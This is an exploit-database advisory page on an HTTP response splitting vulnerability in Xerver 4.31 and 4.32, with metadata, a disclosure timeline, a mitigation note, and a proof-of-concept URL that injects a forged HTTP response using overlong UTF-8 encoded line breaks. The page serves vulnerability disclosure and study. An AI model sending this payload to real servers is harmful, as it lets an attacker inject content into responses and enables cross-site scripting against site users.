header-logo
Suggest Exploit
vendor:
Xerver
by:
SecureState R&D Team - sasquatch
8.8
CVSS
HIGH
HTTP Response Splitting
113
CWE
Product Name: Xerver
Affected Version From: 4.31
Affected Version To: 4.32
Patch Exists: YES
Related CWE: N/A
CPE: a:xerver:xerver:4.31
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win32
2008

Xerver 4.31, 4.32 HTTP Response Splitting

Xerver 4.31 and 4.32 are vulnerable to HTTP Response Splitting attacks. An attacker can inject malicious content into the response header by sending a specially crafted HTTP request. This can be used to perform various attacks such as Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). The proof of concept for this vulnerability is a specially crafted HTTP request containing a malicious payload in the response header.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in the response header.
Source

Exploit-DB raw data:

Xerver 4.31, 4.32 HTTP Response Splitting

Discovered: 04-10-08
By: SecureState R&D Team - sasquatch
Vendor Notified: 04-11-08
Vendor Response: 04-13-08
New version also vulnerable:  10-07-09 Tested (Win32 v4.32)
Vendor Notified: 10-07-09
Vendor Response: NONE
Published:  11-18-09

Proof of Concept:

/test.htm%3BHTTP%C0%AF1.0%20200%20OK%C0%8D%C0%8AContent-Length%3A%2070%C0%8D%C0%8AContent-Type%3Atext%C0%AFhtml%C0%8D%C0%8A%C0%8D%C0%8A%3Chtml%3E%3Cbody%3E%3Cimg%20src%3D%22http%3A//www.website.com/test.gif%22%3E%3C/body%3E%3C/html%3E%8D%C0%8A%C0%8D%C0%8A